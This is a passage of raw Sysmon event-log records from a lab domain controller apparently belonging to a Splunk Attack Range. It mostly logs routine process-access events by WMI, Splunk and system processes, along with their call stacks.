16:54:03.014{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-B4AA-00000000AD01}12712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6DAB-603E-B4AA-00000000AD01}12712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002240019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.015{05ADC7E1-6DAB-603E-B4AA-00000000AD01}12712C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002240018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.014{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.998{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 